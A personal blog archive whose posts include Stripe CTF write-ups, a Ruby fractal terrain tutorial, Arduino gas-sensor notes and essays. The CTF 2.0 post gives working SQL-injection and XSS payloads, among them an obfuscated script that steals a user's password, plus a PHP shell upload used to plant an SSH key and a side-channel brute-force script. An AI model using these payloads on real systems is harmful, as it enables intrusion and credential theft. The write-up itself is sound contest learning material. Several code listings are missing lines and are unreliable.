Articles

# Stripe CTF 3.0

Sadly, level 3 would not run for me, even with Stripe’s patch, so I could not continue with the competition. It was fun while it lasted though – C

Wednesday saw the beginning of another Stripe CTF! This time I was in London when it started so I went to the launch meeting with some old uni friends.

The theme this time was distributed computation, so with a tiny netbook, I dove in to the levels.

## Level 0

Level 0 was essentially an exercise in optimisation. A given text input was checked against a list of words. If an input word was in the preset dictionary, it had to be tagged. The preset dictionary was an ordered list, and as such was O(n) to search. By applying the following:

```index 1558f2d..d07273f 100644
--- orig.rb
+++ mod.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+require 'set'

# Our test cases will always use the same dictionary file (with SHA1
# 6b898d7c48630be05b72b3ae07c5be6617f90d8e). Running `test/harness`
@@ -7,6 +8,7 @@

path = ARGV.length > 0 ? ARGV[0] : '/usr/share/dict/words'
+entries = Set.new(entries)

output = contents.gsub(/[^ n]+/) do |word|```

The list is turned into a set with a  O(1) lookup time. Significantly speeding up the operation.

## Level 1

This level was about cryptocurrencies, and to pass this level you had to mine a … ‘GitCoin’. Essentially, you were given a repo with an initial catalog of transactions. You had to successfully submit a transaction with gave your given use a gitcoin.

Proof of work for a gitcoin was determined by ensuring that the git commit message had a SHA1 signature that was lexigraphically smaller than the difficulty. So add a nonce to your commit message and keep cycling though random numbers until the commit message had a valid signature.

Stripe provided a very slow bash reference implementation, which I still used to pass the level. Instead of increasing the nonce in bash though, I wrote a python script to find a correct hash for me faster.

```import sys
from hashlib import sha1
import random
import string
import Queue as queue

def work(diff, tree,  parent, timestamp, q):
diffl = len(diff)
diff = ''.join('0' for x in range(diffl))
body = "tree %snparent %snauthor CTF user <me@example.com> %s +0000ncommitter CTF user <me@example.com> %s +0000nnGive me a Gitcoinnnnonce: " % (tree, parent, timestamp, timestamp)
while True:
body_b = '%s%s' % (body, ''.join(random.choice(string.hexdigits) for x in range(8)))
s = sha1('commit ' + str(len(body_b)) + '' + body_b)
hex = s.hexdigest()[:diffl]
if hex.startswith(diff):
body = body_b
break
q.put(body)

def main():
diff, tree, parent, timestamp = sys.argv[1:]
q = queue.Queue()
th.daemon = True
th.start()

body = bytes(q.get())
with open('/home/carl/level1/test.txt', 'w') as f:
f.write(body)

th.join(0)

if __name__ == '__main__':
main()```

There were some hurdles I came across while solving this, which show in the code.  The git hashing command `git hash-object -t commit` didn’t just take the SHA1 hash of its input, it would first prepend `commit len(data)` before hashing. This was easy enough to find with a bit of searching, but a major issue I was having that I couldn’t replicate the SHA1 hash unless I first wrote the commit to a file, rather than streaming via stdout. So I just wrote to a file and modified the miner bash script to change:

```@@ -56,12 +56,12 @@ \$counter"

# See http://git-scm.com/book/en/Git-Internals-Git-Objects for
# details on Git objects.
-       sha1=\$(git hash-object -t commit --stdin <<< "\$body")
+       sha1=\$(git hash-object -t commit /home/carl/level1/test.txt)

if [ "\$sha1" "<" "\$difficulty" ]; then
echo
echo "Mined a Gitcoin with commit: \$sha1"
-           git hash-object -t commit --stdin -w <<< "\$body"  > /dev/null
+           git hash-object -t commit --stdin -w /home/carl/level1/test.txt  > /dev/null
git reset --hard "\$sha1" > /dev/null
break
fi```

Which let me get the correct hashes and mine the coin.

## Level 2

Level 2 was all about DDOS attacks. The idea was that there were a number of back end servers, a reverse proxy (which you modified), and a number of clients, some malicious and others not. You had to modify the reverse proxy (called shield) to not let malicious traffic through, and to attempt to minimise back end idleness. Scores were determined by a test harness and also on the git push hook.

Stripe provided the attack code for reference, which made the level really easy. Malicious attackers basically spawned more connections more often, and the numbers that they spawned was defined in the file, as:

```simulationParameters = {
'roundLength': 500, // In ms
'roundCount': 40,
'clientsPerRound': 5,
'pElephant': 0.4,
'mouseRequestsPerRound': 2,
'elephantRequestsPerRound': 50,
'backendCount': 2,
'backendInFlight': 2,
'backendProcessingTime': 75
};```

So from this you can see that malicious clients send 50 requests per round, and normal clients send 2.  So my first solution was just to limit the number of connections from each client with a simple counter. My implementation looks like:

```diff --git a/shield b/shield
index c67bd68..8ba87f2 100755
--- a/shield
+++ b/shield
@@ -7,6 +7,7 @@ var httpProxy = require('./network_simulation/lib/proxy');
var checkServer = require('./network_simulation/lib/check_server');
var nopt = require('nopt');
var url = require('url');
+var rcount = {};

var RequestData = function (request, response, buffer) {
this.request = request;
@@ -14,6 +15,16 @@ var RequestData = function (request, response, buffer) {
this.buffer = buffer;
};

+
+function checkRequest(ip){
+ if (rcount[ip] === undefined) {
+ rcount[ip] = 1;
+ } else {
+ rcount[ip]++;
+ }
+ return rcount[ip] <= 4;
+}
+
function ipFromRequest(reqData) {
}
@@ -29,10 +40,10 @@ var Queue = function (proxies, parameters) {
};
Queue.prototype.takeRequest = function (reqData) {
// Reject traffic as necessary:
- // if (currently_blacklisted(ipFromRequest(reqData))) {
- // rejectRequest(reqData);
- // return;
- // }
+ if (!checkRequest(ipFromRequest(reqData))) {
+ rejectRequest(reqData);
+ return;
+ }
// Otherwise proxy it through:
this.proxies[0].proxyRequest(reqData.request, reqData.response, reqData.buffer);
};```

I committed and pushed, and surprisingly, this gave me a passing score!

## Level 3

This is where the story gets sad. I checked out the code, and I could not get the ./test/harness to work correctly. The tak was a file indexing service, and it had to be optimised. It was written in Scala, which I have never used – so I could not work out how to debug it.  Stripe released a fix, but it still did not fix my issues. At which point I had to move on to other things and could not complete the CTF.

# A Fractal Height Map Generator in Ruby

[I’m migrating my old articles to the blog in order to switch to it entirely]

Date: 25th March 2010

## Introduction

This article describes the theory behind, and how to implement, a basic fractal height map generator. It is based upon the algorithm defined at http://gameprogrammer.com/fractal.html. Height maps are used in many things: positioning software, graphical rendering, and procedural map generation. Given the right conditions, height maps can be used to create visually stunning images, and are frequently used with an alpha channel to simulate clouds.

All source code used in this article shall be made freely available, under a Creative Commons GPL Licence

The implementation which will be defined here outputs an array of numbers, which on the surface seems fairly mundane. However, with a bit of tweaking with VT100 colour codes, or passing to an image generation program, the algorithm can produce outputs such as this:

The ASCII renderer assigns a colour code to a range of numbers and then depending on your ranges, you can create rainbow-like maps like the one above. The grey scale and transparent images had their number arrays passed to an image generation program called RMagick.

## The Theory

I will go through the basic idea again as it was defined in the gameprogrammer link, to keep a consistency with terms used further in the article. So before we get on to the DiamondSquare algorithm, I shall implement the simpler 1 dimensional algorithm, which will describe the height of a line, similar to a horizon. The patterns created show some fractal behaviour, in that it is said to be self-similar. An object is said to be self-similar when magnified subsets of the object look like, or are identical to, the whole and to each other[1].

In context of this algorithm, it means that as we add more detail, the more rougher and major features will still hold true, but more detail will become apparent as we look closer. This makes the algorithm ideal for recursion or iterative methods. This implementation uses an iterative method.

### Midpoint Displacement in One Dimension

For the creation of the 1 dimensional height map, similar to a horizon, a very simple algorithm is used:

```    def generateLine(length)

# Due to this algorithm being simple for
# the articles sake, length should be
# constrained to the powers of 2.
#
# As we need a midpoint, however, length
# should be defined as (2^n)+1.

# Create an array which describes a line.
# Set the default values to 0American Standard Code for Information Interchange
line = Array.new(length, 0)

# Define the range of the terrain values.
# For this example we shall take the range
# of values to be -63 to 63, with the midpoint
# at 0, out default value.
# Range is then 128.
range = 128;

# Work out the number of line segments
# levels there are in the line. As each line
# segment level is defined by deviding by two
# until length is 1, the number of segments
# is the log_2 of the length.
noSegments = Math.log(length-1, 2)

#Iterate through the levels
(1 .. noSegments).each{ |level|

# Work out the line segment length so you
# can properly address the offset.
segLength = (length/2**level)

# Work out the number of line segments
# within this level
noSegL = (2**level)-1

# Iterate through the line segments and
(1 .. noSegL).each{ |segOffset|

# If value is not zero, skip over it, done on a previous
# level
if( line[segLength*segOffset] == 0 )

# Make sure the current value of the line
# is directly midway between its two parents.
line[segLength*segOffset] = (line[segLength*(segOffset-1)] + line[segLength*(segOffset+1)])/2

# Apply random function to value
line[segLength*segOffset] = randomFunction(line[segLength*segOffset], level, range)

end
}
}

return line
end```

Now as you can see the most important part of that algorithm is that which I have purposely missed, randomFunction. This is where you, quite obviously, define how you want your heights defined. A good way is to simply use a bounded random function, where the bounds are defined by the line segment level you are currently within. For example, a function like: ` `

```    def randomFunction(value, level, range)

# Roughness constant 0 < h < 1
# As h approachs 0, the level dependent
# bounds grow and tend to 1 for all values
# of level
h = 0.8

# Define bounds in terms of level and a roughness
# function
multiplier = 2 ** (-h * level-1)

# Perform random function, bound it, and then apply
# multiplier
value += (rand() * (range) - (range / 2)) * multiplier

# Return
return value
end```

` ` Would offset the value of the line a random amount which is bounded by a function dependent on the line segment level and a roughness coefficient. As this function is the heart of this algorithm and the 2 dimensional algorithm, I will go into some detail on the use of the roughness coefficient. If the roughness coefficient is set to 1, then the multiplier acts the same as : $2^{(-l-1)}; 0 < l < infty ; l in mathbb{Z}^+[/latex]. Decreasing the value of h flattens out the function meaning the bounds are less constrictive and allowing for much rougher terrain. Here is a plot of the multiplier when h=0.8 and h=0.2, and a plot of the generated lines when those constraints are used. X axis is equal to line segment level. [gallery columns="2" ids="434,433"] As you can see, the roughness coefficient makes a massive difference to the outputted numbers. For those interested in recreating the plot, I piped the output of the above code into a text file, and then used GNUPlot to make the images.

### Extending into 2 dimensions - The diamond square algorithm

To extend this algorithm into the second dimension, we have to imagine the terrain data as a two dimensional array of numbers. Each number represents a height in this two dimensional field, and so each column and row can be treated similarly to above.

To split up a two dimensional array in a self-similar way we must use squares, or diamonds, which are analogous to the line segments of the 1 dimensional algorithm. Then, rather than using the ends of a line segment to work out a base height the corners of the square, or diamond, are used. For example:

[gallery columns="2" ids="436,435"]

Like the line segment algorithm, the mathematical 'meat' is the same random function as before. The complexity comes in managing which indexes are part of a diamond or a square. So, for example, here is a code segment which works out indexes of a square, depending on level and location, and applies the random function:

` # Get the corners of an arbitrary square and perform operation # on center. # # @param array Array to use # @param topleftIndexX X index of top left of square # @param topleftIndexY Y index of top left of square # @param length Length of the square # @param level Level into the calculation def processSquare(array, topleftIndexX, topleftIndexY, length, level, range, h) # Get coordinates of the corners of the square toprightIndexX = topleftIndexX toprightIndexY = topleftIndexY + length + ((level == 0) ? -1 : 0) bottomleftIndexX = topleftIndexX + length + ((level == 0) ? -1 : 0) bottomleftIndexY = topleftIndexY bottomrightIndexX = topleftIndexX + length + ((level == 0) ? -1 : 0) bottomrightIndexY = topleftIndexY + length + ((level == 0) ? -1 : 0) middleX = topleftIndexX + (length)/2 middleY = topleftIndexY + (length)/2 # Get values topleftValue = array[topleftIndexX][topleftIndexY] toprightValue = array[toprightIndexX][toprightIndexY] bottomleftValue = array[bottomleftIndexX][bottomleftIndexY] bottomrightValue = array[bottomrightIndexX][bottomrightIndexY] # Get average average = (topleftValue + toprightValue + bottomleftValue + bottomrightValue)/4 # Set new value array[middleX][middleY] = average + calculateOffset(level, range, h) end`

Where calculateOffset is the random function in this application. The diamond calculation algorithm is very similar and looks like this:

` # Get the edges of an arbitrary diamond and perform operation # on center # # @param array Array to use # @param topIndexX X index of top of diamond # @param topIndexY Y index of top of diamond # @param length Length of diamond # @param level Level into the calculation def processDiamond(array, topIndexX, topIndexY, arraylength, level, range, h) # Adjust arraylength -= 1 length = arraylength/(2 ** level) #Get coordinates of the diamond rightIndexX = topIndexX + length/2 rightIndexY = (topIndexY == length) ? length/2 : topIndexY + length/2 leftIndexX = topIndexX + length/2 leftIndexY = (topIndexY == 0) ? arraylength - length/2 : topIndexY - length/2 bottomIndexX = (topIndexX + length/2 == arraylength) ? length/2 : topIndexX + length bottomIndexY = topIndexY middleX = topIndexX + length/2 middleY = topIndexY # Get values topValue = array[topIndexX][topIndexY] rightValue = array[rightIndexX][rightIndexY] bottomValue = array[bottomIndexX][bottomIndexY] leftValue = array[leftIndexX][leftIndexY] # Get average average = (topValue + rightValue + bottomValue + leftValue)/4 # Set new value array[middleX][middleY] = average + calculateOffset(level, range, h) # Wraps if(middleX == arraylength) array[0][middleY] = array[middleX][middleY] end if(middleY == 0) array[middleX][arraylength] = array[middleX][middleY] end end`

The only difference with the above snippet is the different indices it retrieves, and that it must handle wrap around for some of the edges.

So currently, we can create arbitrary diamonds and squares within a 2-dimensional array and assign a fuzzy average of the edges according the h value. Now all we need is some code to manage traversing through the levels of iterations and through the diamonds and squares themselves. Here is my solution:

` # The main control loop for the algorithm. # # @param lengthExp Length exponent # @param range Value range # @param h Roughness constant def generateTerrain(lengthExp, range, h) length = (2 ** lengthExp) + 1 array = Array.new array = createArray(array, length) #Go through Levels (irerative recursion) (0 .. lengthExp - 1).each{ |level| # Iterator for the Square part of the algorithm # Will go through the x-axis coords (0 .. (2 ** level) -1 ).each { |sqx| # Y axis coords (0 .. (2 ** level) -1).each { |sqy| gap = length/2 ** level x = (0 + (gap*sqx)) y = (0 + (gap*sqy)) processSquare(array, x, y, gap, level, range, h) } } # Iterator for the diamond part of the algorithm (0 ... (2 ** (level+1))).each { |dix| # Offset in the number of points on the y-axis. Dependant # on if x iteration is even or odd. offset = (dix.even?) ? 1 : 2 (0 ... (2 ** (level+1)/2)).each { |diy| gap = (length/2 ** (level+1)) ygap = 2 * gap x = (0 + (gap*dix)) if (dix.even?) y = 0 + (ygap*diy) else y = gap + (ygap*diy) end processDiamond(array, x, y, length, level, range, h) } } } return array end`

And this gives us our array with its height map hidden inside. Using a library like RMagick we can output images like the ones shown above. To create the gray scale image, the following code was used:

` image = Image.new(array.length, array.length) (0 ... array.length).each { |x| (0 ... array[x].length).each { |y| val = array[x][y] * (2**9) # Create greyscale image image.pixel_color(x, y, Pixel.new(val, val, val, val)) } } image.display`

Which just takes the value in the array, and multiplies it by 512 which gives the values a range of [latex]0 ge v ge 2^{15}, ; frac{v}{512} in mathbb{Z}$

. This gives us the gaseous image that has been generated above.

## Code Listings

A library version of the ruby code found in this tutorial can be found at GitHub.

## References

1. Voss, Richard D., FRACTALS in NATURE: characterization, measurement, and simulation. SIGGRAPH 1987

Based on a work at gameprogrammer.com.

# Stripe-CTF 2.0

I managed to finish the Stripe CTF with 18 hours to spare and placed no. 702. I’m pretty happy with the result considering how little time I actually spent on it! My progress can be found here and you can see when I took days off!

Overall the competition was really enjoyable and the final hangout in the irc channel while my program was breaking the flag really made me feel part of the community.

I won’t publish this until the end of the deadline, but I’ll try to remember how I broke through each level and give the code I used:

### Level 0

Very simple! A beginner SQL injection attack which leveraged the following line in the code:

```var query = 'SELECT * FROM secrets WHERE key LIKE ? || ".%"';
db.all(query, namespace, function(err, secrets) {
...```

This essentially put namespace into the ‘?’ of the statement. My setting namespace to a wildcard (‘%’) the page dumped its data and the password to the next level.

### Level 1

The task for this level was to guess a combination that was defined in a hidden file (“combination.txt” or similar) which would then unlock “password.txt” and output to a web page. The code which read in the combination looked like:

```extract(\$_GET);
if (isset(\$attempt)) {
\$combination = trim(file_get_contents(\$filename));
if (\$attempt === \$combination) {
...```

The key thing I could exploit here was “extract(\$_GET)” which just created variables for what ever was in the GET params with no checks. Simply passing “&filename=&attempt=” as params got me past the if statement and the password was outputted.

### Level 2

This level was referred back again and again, as you could upload files to it and execute code from a level02-*.stripe-stf.com domain. The idea was to get the contents of the file password.txt which was not accessible from the webserver. Uploading a .php file which read the contents of the file and echoed it worked by just browsing to “/uploads/getfile.php”

### Level 3

This was the first level which was hard! I’d never really done a proper SQL injection before and it was quite satisfying to get working. The SQL injection point was:

```query = """SELECT id, password_hash, salt FROM users

which meant that I was stuck with the start of the statement regardless, and the python-sql link didn’t allow multiple statements. I read up on SQL attacks and ended up using a combination of UNION and SELECT AS in order to inject my own data into the response. However, the only thing I could inject was an id, password_hash, and a salt. The id allowed me to spoof a user, and I could determine what my hash should be given a known salt. My injection was

`' union select 1 as 'id', '961b6dd3ede3cb8ecbaacbd68de040cd78eb2ed5889130cceb4c49268ea4d506' as 'password_hash', 'a' as salt ; --`

Which made the proper request to the database return nothing, and then I combined it with my own data, which was an id for 1, the SHA256 hash of “aa”, and a salt of a.

Putting the above in the username field and setting my password to ‘a’ I got authenticated. Then I just changed ids between 1-3 until I got the correct user.

N.B The secrets for the other users, which claimed to be either the solution to P=NP, and a plan for a perpetual motion device seemed to be generated from scigen

### Level 4

This level was weird, and was  a JavaScript injection attack. The given website had a simple concept: users passed karma between each other. However, to show that they really trusted the user they were giving karma to, your password was shown to people who gave you karma. There was a system generated user called ‘karma_fountain’ whose password for the code to unlock the next level.

The inject route was: Set your password to some JavaScript, send karma to your prey, when they logon the JavaScript would execute. Luckily, karma_fountain logged in every minute and my password was set to (wrapped in script tags):

`\$.post('/user-izwsyuhfyt/transfer', { to: "karma", amount: "1"});`

### Level 5

This was black magic. It was solved near accidentally and then inspected to work out why.

Essentially you had to trick the system to think that it was receiving a command which solved the regex:

`/[^w]AUTHENTICATED[^w]*\$/`

.However, the command had to be returned from a stripe-ctf domain, and to get the code the system had to think it came from a level5.stripe-ctf domain.

Using level 2, I uploaded a .php (.txt was forbidden in the webserver rules) which just echoed ” AUTHENTICATED”, and passing the address for that got me authenticated as a level02 domain. Now all I needed was to get it to authenticate as level05.

In the end, the url i gave it was itself, with the post parameters it needed for level2 in the get params.  Essentially this is what happened:

1. Level5 posted to itself with a domain of level5.* and get params for level2 auth
2. From this post the level2 auth were collected by the post param get functions
3. Authed as level2
4. Authed as level5

BLACK MAGIC

### Level 6

This level was incredibly fiddly, but FireBug really helped with it. Essentially it was a blogging site, and there was an injection point in the blogroll. However, the database had a “safeInsert” method which dropped any data which had an apostrophe or quote in it. This just made it awkward.

The site had a “/user_info” page which a user could view their unsanitized user and password. The user which I needed to get the password from apparently has quotes and apostrophes in its password, so I also needed to sanitize them before getting them out of the system. The only way to do that would be to make my prey post their password.

So the exploit work flow is:

1. GET /user_info
2. Strip password and convert to character code
3. POST this to /ajax/posts with a scraped ‘_csrf’ token to authenticate

This had to be done with no quotes or apostrophes so any strings were generated using String.fromCharCode(). Here’s the formatted exploit code I used:

```\$.get(String.fromCharCode(117,115,101,114,95,105,110,102,111),
function(response) {
var a = \$(String.fromCharCode(60,100,105,118,47,62)).html(response).find(String.fromCharCode(46,115,112,97,110,49,50,32,116,100)).text();
var u;
for(i=0;i<a.length;i++){u += String.fromCharCode(32) + a.charCodeAt(i)}
\$.post( String.fromCharCode(97,106,97,120,47,112,111,115,116,115),
{
title: String.fromCharCode(88,83,83),
body: u,
_csrf: \$(String.fromCharCode(102,111,114,109,35,110,101,119,95,112,111,115,116,32,105,110,112,117,116))[0].value
});
}
);```

### Level 7

I was given an API to a “WaffleCopter” service and had to request a premium waffle in order to get the password. I was not a premium user. Each request was signed with a SHA1 hash. They could be replayed.

After googling for SHA1 vulnerabilities and hanging around in the channel I discovered that there was a padding vulnerability in SHA1 and that were was a handy python script which would do all the work for you.

Combining this tool with a web request, I was able to use an old request from user 2 who ordered a “dream” premium waffle, add “&waffle=leige” to the end of the query and the magic python script worked out padding that got me the same signature as the original request!

### Level 8

This was incredible and a nice mix of frustrating, hard, and madness.

Essentially: The flag was a 12 digit number, it was kept by a program which then split the password into 4 chunks and were held by separate instances. You interrogated the main instance of the passwordDb and it would ask the chunks if it was correct. the service would then reply {success: false/true}. You could also pass it a “webhook” which would get the results rather than the curl/browser call.

The server also only accepted data from a *.stripe-ctf.com domain.

So, first problem, I needed to get that password: The chunking was an advantage, as if I was brute forcing individual chunks I would only need a 10^3 search space 4 times, rather than 1 10^12 search space. this made brute forcing practical. While on a local instance of the server I could interrogate the chunk_servers individually, on the level8 server I did not have that option, so I needed the go through the primary_server.

Due to reflection magic, when a webhook is used and a chunk says a password chunk is wrong, it directly tells the webhook true/false. And the port which is used is dependent upon which chunk is replying! A port difference (from the port of your last request) of 2 meant chunk 1 had rejected your password, 3 meant chunk 2, and so on.

This gave a side channel style attack where you could sequentially increase each chunk depending on which chunk returned false. This meant you could break the flag in <= 4000 requests. Ace.

So, the second problem, getting access to a .stripe-ctf.com domain. The problem statement said that sshd was running.  Attempting the ssh in with your generated username failed due to no public key. Hmm. Uploading a php script with a simple form and a shell_exec command essentially gave me a poor mans command line and after much faffing was able to upload a public key, create a .ssh/ folder, and add my key to an authorized_keys file. Then I was in.

Running my cracker on the production server came up with some problems: the port differences were sometimes more than 5. I assume this was because of the amount of people on the server. I modified the program to ignore any weird port differences and keep trying until a sane one was found. The server was also INCREDIBLY SLOW. It took me about 3 and half hours to brute force my flag with the following:

```require 'socket'
require 'net/https'

ENDPOINT = "https://level08-4.stripe-ctf.com/user-ianrhgpijr/"
WEBHOOK = "level02-3.stripe-ctf.com"

# current port and chunk values
last_port = -1
chunk1 = 0
chunk2 = 0
chunk3 = 0
chunk4 = 0

# Open webhook port
server = TCPServer.open(50001)
puts "[Server]:: listening on port #{server.addr[1]}"

# Until finished (practically forever on production)
while true

# Start POST request to endpoint
uri = URI(ENDPOINT)
req = Net::HTTP::Post.new(uri.to_s)

# Pad out to chunks of 3, with zeros
password_chunk = "#{chunk1.to_s.rjust(3, '0')}#{chunk2.to_s.rjust(3, '0')}#{chunk3.to_s.rjust(3, '0')}#{chunk4.to_s.rjust(3, '0')}"

# Build request

http = Net::HTTP.new(uri.host, Net::HTTP.https_default_port)
http.use_ssl = true

# Send request, we only really care about the response when it returns true
http.start { |h| @response = h.request(req) }

# Wait on webhook
client = server.accept

if (last_port != -1)

# Get port difference

# Verbose is good on dodgy production server
puts "[CHUNK]:: #{password_chunk} & port_diff = #{diff}"

# Incerement chunks based on port difference
if (diff == 2)
chunk1 += 1

elsif (diff == 3)
chunk2 += 1

elsif (diff == 4)
chunk3 += 1

elsif (diff == 5)
chunk4 += 1
# Last chunk, we can start checking the flag result!
if (@response.body.include?('true'))
# Woo got the flag
break
end
end
end

client.close
end```

### Conclusions

All in all it was a brilliant competition to spend hours in distraction with. Looking forward to the next one (and my free t-shirt).

# Big displays and tabletops – the wrong approach?

## The current model

Current research trends are in favour of large public displays, hidden projectors, and table top displays – Microsoft’s Surface being a prominent example along with the many research projects involving public displays.

A lot of these projects have options for multiple users operating the systems, in fact some are made only for collaboration in the workplace (Highwire’s CoffeeTable, and Intel’s What Do You Bring To the Table?). However, when systems are in a public setting, the use becomes more of a public service than a means for collaboration and when the users are acting independently great efforts are made to determine identity and facilitate independent interaction and data presentation.

The classic example of this is where you walk up to a public display in a university and the display shows your time-table.

In the above scenario, what happens when a display is surrounded by more than one person – say 5 people. Does it show 5 individual timetables? If 50 people approach the display does it show 50 timetables? That is impractical, so what is a fair way to display a crowds worth of information to a waiting crowd? It could be shown one at a time, but then who gets to see theirs first, and more importantly how does one recognise your own timetable if you can’t remember it in the first place? Does your name have to appear with the time-table? Will public users be comfortable with this scenario? What authentication methods are used for systems such as these, do users need to opt in, will these questions have the same answers for different displays?

If we ignore other issues except authentication, how does the display know who you are to display the relevant information? Read a unique ID from your phone, a smart card, or some other wireless unique device? How does this deal with phones being sold, or smart cards being lost? What happens if someone of a criminal nature got hold of young student’s ID card and started stalking the student? Is there a line of how public information must be before it appears on a public display? Even if the display is not in a completely public setting, say it is behind the security check point in a company, who decides the amount of information which is displayed on a screen? The user, or the programmer in charge of the presentation software? If authentication is required before information is shown on a display, does this not ruin the workflow of the display – and would this not also stop frantic late users from approaching the system?

With privacy being a current issue within society, do not public displays get relegated to becoming glorified billboards with the only personal information they will be allowed to show will be that which could be found on the public page of a person? Will the only use of these systems be for when one has lost their phone, and the display is currently free?

Currently I believe the only use of these systems will be gained from location-based advertising – where content is changed based on the demographic of people around it and the time of day.

## A different model

If we are looking into the future (a trait which many scientists are likely to do) there is another model which is what I believe public interacting displays should be tending towards.

By dissecting the mission of a public display it can be seen that it encompasses two functions.

1. Being a dedicated geographical point for a certain type of information or request,
2. Having a method to display feedback to the user.

If we look to the future and imagine a hypothetical piece of hardware exists, we can remove point 2 from the list of needed functions – and remove a lot of privacy issues.

We have this technology – albeit in a crude way – at the moment. A personal screen. Currently, this tend to be a smart phone/device of some sort. These tend to have authentication when they are switched on, via a pass code. They even support banking systems which – one would hope – worry about the security of the device in question.

The limitations of these devices are their size and resolution. A personal screen of 4 inches isn’t brilliant, so let us create a hypothetical product to facilitate this model. Imagine a pair of glasses which could project upon its lenses virtual displays at any arbitrary projection and geometry to simulate real life displays. They could even be simulated on static points in the real world, needing a user to be close to it for it to be used – as in real life. The simulated displays would be displaying what ever the public display wanted to – by virtue of its number 1 function: being a dedicated geographical point for a certain type of information or request.

Let’s go back to the 50 people in front of a timetable billboard. With their own personal screen they would be seeing just their timetable, in an almost completely private setting – while still being surrounded by 49 other people. In fact, if wireless communication density is sufficiently high, it could replace conventional screens on desks, on phones, all together. With regards to public billboards though, advertisers would be able to get what they have always wanted – a message directly to who they want it to go to.

This is of course all conjecture, but I think it should be where the domain should be heading.

# Arduino Gas Sensor – Part 2

## Previously

So I left the last article with the following:

Well apart from the hardware I need, so issues need to be addressed which may or may not require extra hardware – as I’ve just thought of them.

• DateTime equivalent object for when I register a pulse
• Work out how long these will last on battery
• Can I set an interrupt to go off when a digital value hits a threshold? Or does this require analogue input? If I can it would massively save on battery as no polling! But, it may require fiddly per-house calibration, which the brute force method ignores
• Laser/3d Printed box and some form of mounting which will let me attach to anything. Probably going to be velcro

So I’ll go through what has been done since then via this criterea.

## Hardware Changes

The DateTime object style thing was achieved through an RTC module (http://www.sparkfun.com/products/99) which communicated to the ‘duino using the I2C bus and takes 5V. A microSD card shield was also added to the hardware for saving events into a simple text file (http://www.sparkfun.com/products/9802).

Rather than use my hastily build photosensor, I used a load of RFXcom sensors as they are well built and have a housing designed for sticking to the meter (Which is by far the biggest engineering challenge of this project). A board layout for interfacing with the sensor units was created and the gEDA/gSchem schematic file can be found on the git hub project page.

## Software Changes

Well, apart from the stuff which interfaces with the RTC module and the microSD card, not much has changed code wise. The way the RFXcom modules work was backwards to my prototype, so I measured the time it takes to discharge a capacitor rather than charge. An LED on a meter normally flashes for .1s, so the timout is set to 0.05s.

## Battery Life

Using a multimeter showed the whole sensor drew 92mA. It isn’t ideal, but with a 6 AA battery pack which packs ~3000mAH which lasts a bout a day ( 🙁 ) However,  that was with a ridiculously high powered infrared LED on the RFXcom board. Using just the photosensor (rather than the reflective) the power output was 42mA and that was with the SD card always powered. There is a lot of scope for battery life improvement on this project.

## Source

The source can be found on my github page at https://github.com/carl-ellis/Arduino-Gas-Sensor .

# Arduino Gas Meter Sensor – Part 1

## Motivation

My newly ordered Arduino Uno came in the post today so I got to start building with it!

An upcoming sensing deployment needs a way of sensing gas usage, so I’m building a basic sensor to measure it. Luckily, most gas meters have an LED pulse which goes off every so often and we can measure that. The one in my house informs me the light will pulse every 10 dm^3 of gas, so every time the second number from the right on the meter ticks the light will pulse. Failing this, the 0 on the right most dial is very reflective, and an LED can be used to reflect light from it.

As the extra bits I need to finish the sensor hasn’t come yet, namely the SD card shield and a battery pack, I can’t lock the sensor in my gas cupboard and give it a test, so for the time being I’m turning off my computer screens and lights, then flashing a red head torch at it to simulate a pulse.

## Code

After a bit of internet trawling, I found an ace site laying down how to do the wiring for a digital light sensor (http://www.ladyada.net/learn/sensors/cds.html#bonus_reading_photocells_without_analog_pins [This link seems to have died since the post was written, the circuit diagram will be linked in at the end of the post.]). From that, I added in a method which took a rolling average of the last 5 measurements and outputted if the measured light was brighter than 110% of the average (not exactly statistical, but I intend for these to be locked in a dark box…).

Here’s what I have so far:

```/* Based on: Photocell simple testing sketch.
Connect one end of photocell to power, the other end to pin 2.
Then connect one end of a 0.1uF capacitor from pin 2 to ground

// Number of measurements for averaging
const int AVERAGE_LENGTH = 5;

int photocellPin = 2;     // the LDR and cap are connected to pin2
int ledPin = 13;    // you can just use the 'built in' LED

// for the circular buffer
int average = 0;
int counter = 0;

void setup(void) {
// We'll send debugging information via the Serial monitor
Serial.begin(9600);

// Initialise the array
for(int i=0;i<AVERAGE_LENGTH;i++) {
}
}

void loop(void) {
// read the resistor using the RCtime technique

// Calculate rolling average
++counter %= AVERAGE_LENGTH;
calcStats();
int bound = average - (average/10);

// Glorious debug
Serial.print("Av = ");
Serial.print(average);
Serial.print(" = [");
for(int i=0; i<AVERAGE_LENGTH;i++) {
Serial.print(",");
}
Serial.print("] ");
Serial.print(" . RCtime reading = ");
} else {
Serial.println();
}

delay(100);
}

// Calculates the new mean based on the last 20 measurements
int calcStats() {

// average
average = 0;
for(int i=0;i<AVERAGE_LENGTH;i++) {
}
average /= AVERAGE_LENGTH;
}

// Uses a digital pin to measure a resistor (like an FSR or photocell!)
// We do this by having the resistor feed current into a capacitor and
// counting how long it takes to get to Vcc/2 (for most arduinos, thats 2.5V)
int RCtime(int RCpin) {

// set the pin to an output and pull to LOW (ground)
pinMode(RCpin, OUTPUT);
digitalWrite(RCpin, LOW);

// Now set the pin to an input and...
pinMode(RCpin, INPUT);
while (digitalRead(RCpin) == LOW) { // count how long it takes to rise up to HIGH
reading++;      // increment to keep track of time

// if we got this far, the resistance is so high
// its likely that nothing is connected!
break;           // leave the loop
}
}
// OK either we maxed out at 30000 or hopefully got a reading, return the count

}
```

## Next Steps

Well apart from the hardware I need, so issues need to be addressed which may or may not require extra hardware – as I’ve just thought of them.

• DateTime equivalent object for when I register a pulse
• Work out how long these will last on battery
• Can I set an interrupt to go off when a digital value hits a threshold? Or does this require analogue input? If I can it would massively save on battery as no polling! But, it may require fiddly per-house calibration, which the brute force method ignores
• Laser/3d Printed box and some form of mounting which will let me attach to anything. Probably going to be velcro.

Here’s a video of it working:

# 4 weeks in corporate research – initial thoughts

So I’ve spent the last 4 weeks in Cambridge working as an intern at Microsoft Research and I thought I’d share my observations on the differences between academia and corporate research.

Academia, I find, is far from the ivory tower that it once was. Forgetting the worrying need to find economic benefit for projects, most research is now being spun as a product.

Surely the last thing you want for a product is a buggy bloated research prototype, and surely the last thing you want for a research project is a polished product. I mean you want it for one thing, to prove a hypothesis for your thesis.

